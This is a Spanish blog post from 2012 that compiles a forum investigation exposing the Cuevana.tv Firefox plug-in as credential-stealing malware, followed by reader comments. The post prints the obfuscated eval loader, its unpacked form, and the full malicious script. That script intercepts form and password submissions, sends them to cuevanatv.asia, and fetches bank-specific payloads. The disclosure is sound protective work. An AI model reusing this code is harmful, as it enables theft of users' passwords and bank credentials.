El plug-in de CUEVANA.TV ROBA DATOS Y CONTRASEÑAS de los usuarios

Toda la entrada es una recopilación de un post de Forocoches, abierto por el usuario srednalF, le agradecemos a él y a todos los demás usuarios de Forocoches que han ayudado ( y lo siguen haciendo ) para descubrir qué hay detrás de todo este lío. Esta entrada se irá actualizando con la información, datos y demás que se vayan averiguando poco a poco.

NOTICIA REDACTADA por el usuario RME de Forocoches:

(Link al post original: http://www.forocoches.com/foro/showthread.php?p=119904298 )

Cuevana.tv, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene codigo malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, éste pide autorización para instalar un complemento (plugin) para tu navegador (tanto firefox como chrome).
Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web http://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.

Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”.
Despues de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.

Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip…), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”.
Una vez abierto ese archivo observa la linea número 232.

Código:

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

En ella se encuentra este fragmento de código que lanza una petición hacia la web http://cuevanatv.asia que es la que captura los datos personales.

Muchos usuarios ya estan haciendo eco de la noticia bajo los hashtag #Cuevana , #CuevanaRoba y #PluginCuevana

———————————-

Todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:

http://i47.tinypic.com/15n0wpj.png”

———————————-

actualización : post #217, el forero muertet ha encontrado la parte de código maliciosa tambien por sus propios medios, queda confirmado, que para firefox 15 /ubuntu 11.10/windows 7 y plugin cuevana 4.2 este problema existe.
———————————-
Aquí un vídeo de cómo “actúa” el plug-in:

actualización : confirmado, en firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.

———————————–
ACTUALIZACIÓN IMPORTANTE:

Confirmado que el plugin oficial tiene phising

Pruebas:
Descomprimir xpi con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO INSTALEIS)

Entrar en la carpeta “content” y mirar la linea 232 del archivo “script-compiler.js”.

La url maliciosa es hxxp://cuevanatv.asia/back3.js

———————————-

IMPORTANTE: En el post #294 hay una RECOPILACIÓN de todo el MALWARE del plug-in.

———————————-

MUY IMPORTANTE:

Para todo aquel que sepa de programación/código y demás, aquí el código malicioso, gracias al usuario muertet de Forocoches:

ESTÁ ESCONDIDO EN EL script-compiler.js del plugin de firefox. En forma de eval. Si se hace el unpack podemos encontrar las peticiones citadas.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

Unpacked:

var r=new XMLHttpRequest();
r.open('GET','http://cuevanatv.asia/back3.js?'+Math.random(),false);
r.send(null);
eval(r.responseText);

El script malicioso:

var r = new XMLHttpRequest(); r.open('GET', "http://cuevanatv.asia/scripts.txt", false); r.send(null); if (r.status == 200) eval(r.responseText); OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).O S; OSid = (OSid=='Darwin')?3:((OSid=='WINNT' )?2:((OSid=='Linux')?1:0)); function _sData(datos, url) { var r = new XMLHttpRequest; r.open("POST", "http://cuevanatv.asia/add.php", true); r.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); r.send("d="+datos+"&o="+OSid+"&u="+url); } Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverServi ce).addObserver({ observe : function(aWindow, aTopic, aData) { if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') { var win = aWindow.wrappedJSObject; win.addEventListener("submit", function(e) { datos = []; enviar = false; for each(i in e.target.elements) { if(i.type=='password') enviar=true; if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) datos.push(i.name+"::"+i.value); } if(enviar) _sData(datos.join(":_:"), win.location.href); } ,false); var xmlhr = new Object(); xmlhr.open = win.XMLHttpRequest.prototype.open; xmlhr.send = win.XMLHttpRequest.prototype.send; if (win.location.host.indexOf("facebook.com")==-1) { win.XMLHttpRequest.prototype.open=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.open.apply(this, arguments); xmlhr.metodo = a.toLowerCase(); xmlhr.url = b; if(xmlhr.metodo=='get') xmlhr.datos = b.split("?")[1]; } win.XMLHttpRequest.prototype.send=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.send.apply(this, arguments); if(xmlhr.metodo=='post') xmlhr.datos = a; xmlhr.callback(); } } xmlhr.callback = function(){ enviar = false; activadores = ["pass", "pss", "clave", "contra"]; for each(dato in this.datos.split("&")) { for each(activador in activadores) { if(dato.split("=")[0].indexOf(activador)>-1) enviar=true; } } if(enviar) _sData(this.datos.split("&").join(":_:").split("=" ).join("::"), win.location.href); } win.addEventListener("DOMContentLoaded", function(e){ for(site in scripts) { if (win.location.host.indexOf(site)>-1) { var r = new XMLHttpRequest(); r.open('GET', scripts[site], false); r.send(null); if (r.status == 200) eval(r.responseText); } } },false); } } }, 'content-document-global-created', false);

El scripts.txt:
var scripts = { 'santander.com.mx':'http://cuevanatv.asia/plugin.js', 'banvenez.com':'http://cuevanatv.asia/plugin1.js', 'scotiaweb.com.mx':'http://cuevanatv.asia/plugin2.js' }

A parte de keylogger, está especializado en robar cuentas de esos bancos.

———————————-

AVISO! Actualización a las 19:25

Cuevanatv.asia parece ser que ha caido, o ha sido el host o ellos mismos.

http://www.downforeveryoneorjustme.com/cuevanatv.asia

———————————-

AVISO! Actualización a las 19:50

El nuevo plugin (diferente pero con la misma version para que no se sospeche ) YA NO ROBA DATOS. En el tamper Data ya no da el aviso que daba antes. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.

———————————-

19:57

Confirmado, solo cambia la linea 232 del fichero script-compiler.js

Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de forocoches se puede encontrar el ficheo original con el código malicioso, como prueba.

———————————-

IMPORTANTE: Aclarar que GalactiCow no culpa directamente a CUEVANA, ya que pueden haber infectado el plug-in terceros, simplemente difundimos la información. Desde GalactiCow aconsejamos borrar el plug-in y cambiar todas las contraseñas y/o nombres de usuarios posibles.

Aquí el link al post de FOROCOCHES con toda la información, datos, comentarios, etc:

http://www.forocoches.com/foro/showthread.php?t=2923803

Publicado el 16 septiembre, 2012 en Galactic Cow, Informática, Internet, Momieces, Visto por ahí. Añade a favoritos el enlace permanente. 54 comentarios.

  1. no es PODRIA, es ESTA, cojones

  2. El Twitter de esta gente @Cuevana hay que pedir explicaciones que corra la voz.

    @Cuevana

  3. Se ha notificado a firefox?

  4. Hola buenas tardes, llevo mucho tiempo buscando a alguien que me pudiera invitar a forocoches.
    Alguien podría hacerme el favor?
    cuazga@hotmail.com

  5. Una pregunta, esto afecta también al plugin de chrome?

  6. ¡Vaya, vaya, vaya! Ya se han dado cuenta rápidamente de que el plugin afectaba. Si es que…esta gente…
    No se puede fiar de lo que hacen algunos por varias páginas web’s.

  7. Jummmm… en lo personal no me sorprende… siempre tuve una mala espina con esa pagina, afortunadamente nunca la usé

  8. He tratado de comprobar la información yo mismo instalando el add-on Tamper Data en Firefox 15.0.1 sobre Ubuntu 12.04 pero no he visto el comportamiento sospechoso que se observa en el video. Según entiendo puede ser que el plugin ya se haya actualizado y esté usando la versión sin el código malicioso, pero viendo la información del add-on de Cuevana veo que el campo de “Last Updated” está fijado a 21/06/2012. ¿Si el add-on es nuevo no debería reflejar la fecha de hoy (16/09/2012)?

    • Siguen sin dar señales de vida, puede ser porque se les ha marcado como phising (con lo cual ya no tiene sentido seguir fingiendo que son legales) o porque les han hackeado (además del plug-in, la cuenta en Twitter, quiero decir).

      Te he hecho RT con nuestra cuenta en Twitter, btw!

  9. He analizado el código fuente instalado en mi propia computadora hace tiempo (más de un mes) y la versión modificada y efectivamente se observa la diferencia en el código fuente. Aparte de la resp. obvia que Cuevana estaba espiando a los usuarios, también podría indicar que alguien ingresó al servidor de Cuevana y modificó el código fuente del plugin. No sería la primera vez.

    Aqui pueden ver las diferencias de los dos scripts (el publicado por uds y el que tenía instalado yo):
    http://blog.segu-info.com.ar/2012/09/el-plug-in-de-cuevana-roba-informacion.html

  10. Uso cuevana desde hace unos años creo. Y nunca me robaron nada. Ni paypal (y tengo guita y todo). Ni información personal ni de tarjetas de crédito..

    Que quieren q les diga, esto es mas fake q la mierda.. Tiran esta información para que la gente use alguna otra pagina para ver pelis o vids.. Cualquiera lo q hacen, y me enorgullezco de decir q soy programador, estos giles te muestran 3 codigos locos y se rien de la gente mintiendole.

    PRIMERO: El Plugin no se actualiza solo sin permisos tuyos (por lo menos el mio) y me quieren decir que lo cambiaron?.. jajajaj no me hagan reir. Si tuvieran la capacidad para cambiar el plugin de esta manera, no necesitarian ni siquiera el plugin. (me fije envio y rastreo de paquetes del plugin, nunca se actualizo y si lo hace, pide permisos)

    SEGUNDO: Les hacen bajar un script de una pagina cualquiera para que comparen con el suyo muchachos… NO me jodan. Enserio son tan estupidos?.. Ahora te subo un codigo nuevo entra a http//:Codigorealdecuevan.ENSERIO.ESREAL.com/descargartrucho
    (dejo el sarcasmo de lado un toke para dedicarme a decirle a la gente q subio esta noticia, que por cierto, la tomaria 20% en cuenta si la info la subieran en alguna pagina q valga la pena verdad, que son una manga de inutiles fracazados busca quilombo, dejen vivir a la gente, si tanto les jode cuevana es por que son competencia de esta pagina.. No jodan, mira lo sucio q son para tener que subir esto).

    TERCERO: No soy ni formo parte de cuevana (ya seguro q salta algun tarado a revolver todo para tapar su mierda), pero como dije, soy usuario de cuevana y varias paginas mas, que realmente se merecen el estar tan posicionadas. Son muy buenas paginas (GRATUITAS) y nunca pero nunca fallan. Se merecen respeto, no esta mierda de gente random.

    Saludos manga de Garkas.

    • Si tan entendido eres de informática, que no de la lengua castellana (como demuestras), sabrías que no por “robarte” los datos y tener acceso a ellos cocmo información, automáticamente los van a usar/cambiar.

      No por dejar abierta la puerta del coche quiere decir que vayan a entrar a robar en el.

      La carrera de Ing informática muy bien por lo que comentas, pero ética, filosofía y lógica de la ESO mal, por lo que veo.

    • Solo te diré una cosa…Antes de criticar, aprende a escribir.

    • OJO: Aprende a escribir todo lo que has escrito. Relee la información que se ha dado, relee lo que se ha puesto y relee lo que se ha implementado. Todo lo que se ha dicho aquí, ha sido fruto de una información fidedigna de lo que se ha encontrado. NO DUDES de que, todo lo que se ha dicho hasta ahora, es totalmente cierto. Así que…comprueba y retracta de todo lo que has dicho.
      Slds…

  11. Por todo lo que es santo, pasa eso por un analizador sintactico porque es casi ilegible. Hay incluso una utilidad web para hacer eso http://jsbeautifier.org/

  12. Toda la razón tienes Rodrigo. Quiero aclarar que soy ingeniero en informática, con buenos conocimientos en el área de seguridad y ninguna de las cosas mencionadas en ésta página cierra completamente. Para empezar, ese código javascript minificado que muestran al principio, podrá ser real (ni me voy a tomar el trabajo de verificarlo), pero es totalmente inofensivo y ni siquiera hace el pedido GET hacia el dominio de .asia como indican. Despues en la version “unpacked” mágicamente aparece ese dominio .asia. y así como ese hay cabos sueltos por todos lados.

    Saludos.

    PD: Yo no voy a andar insultando a nadie, pero para los ingenuos que se creen estas cosas (y que defienden sin lógica alguna), por favor no insulten a los pocos que intentamos aclararlas.

  13. hola pues les informo a los que no creen esto y dicen que son ing. informaticos (que la verdad no creo) y que ya hicieron sus pruebas estan equivocados, porque simple los admin de cuevana ya admitieron que sus plugins estaban infectados y que ellos actualizaron apenas para corrigir ese prolblema (que la verdad pocos somos los que sabemos que lo hicieron pro que fueron desubiertos y dicen que fueron hackeados haaaa).
    aqui te tw oficial https://twitter.com/Cuevana

    • Muchas gracias por el aporte!

    • +1
      A ver si así la gente deja de intentar defender lo indefendible xD

      • +1 al +1.
        A los que vais de ingenieros informáticos expertos en temas de seguridad y quedáis tan mal… ¿os contratan luego?

        En todas partes (incluso los propios admins legítimos de Cuevana) se afirma que ha sido un fallo de seguridad, una brecha (para los más técnicos).

        Más claro no puede estar, vamos.

  14. Recién chequeé el domain:
    https://www.gandi.net/whois/details?search=cuevanatv.asia

    Esta registrado el dominio a través de Gandi, que son registradores. Me parece que \”Maria Helena Chaves\” es solo una empleada de Gandi. Es una empresa francesa con oficinas en España, parece

    Con cuevana.tv sale esto:
    https://www.gandi.net/whois/details?search=cuevana.tv

    cuevana.tv fue registrado por Dattatec. Es de Argentina.

    No se si esto es una obviedad, se me ocurrió recien, capaz sirve de algo.

    abrz.

  15. ¿Por qué no me creo a Cuevana?
    plus.google.com/u/0/115097102443606912574/posts/giqzCizKCym

  16. La culpa es de Cuevana y de Dattatec la empresa de hosting.

  17. Como borro el plug-in

  18. Spot on with this write-up, I truly believe this web site needs
    much more attention. I’ll probably be returning to read more, thanks for the information!

  1. Pingback: Un plugin de Cuevana habría robado claves de usuarios - FayerWayer

  2. Pingback: Un plugin de Cuevana habría robado claves de usuarios | mundoTEKNO

  3. Pingback: Un plugin de Cuevana habría robado claves de usuarios | SoftMexico - (SinapsysMx)

  4. Pingback: Alarma en la web: un plugin de Cuevana les habría robado claves a los usuarios :: MedellinStyle.com

  5. Pingback: » Alarma en la web: un plugin de Cuevana habría robado claves a los usuarios

  6. Pingback: ¿El plug-in de Cuevana roba información financiera? « Hackers en la red

  7. Pingback: Plugin de Cuevana habría robado passwords : International Fuel

  8. Pingback: Alarma en la web: un plugin de Cuevana les habría robado claves a los usuarios – Villalongahoy

  9. Pingback: VidaInformatica » Un plugin de Cuevana habría robado claves de usuarios

  10. Pingback: Un plugin de Cuevana habría robado claves de usuarios Noticias

  11. Pingback: Peru Crack » Comunidad PeruCrack

  12. Pingback: Enlaces de la SECmana – 141 | Desgobierno de Chile

  13. Pingback: Problemas de seguridad para Cuevana | Symam

A %d blogueros les gusta esto: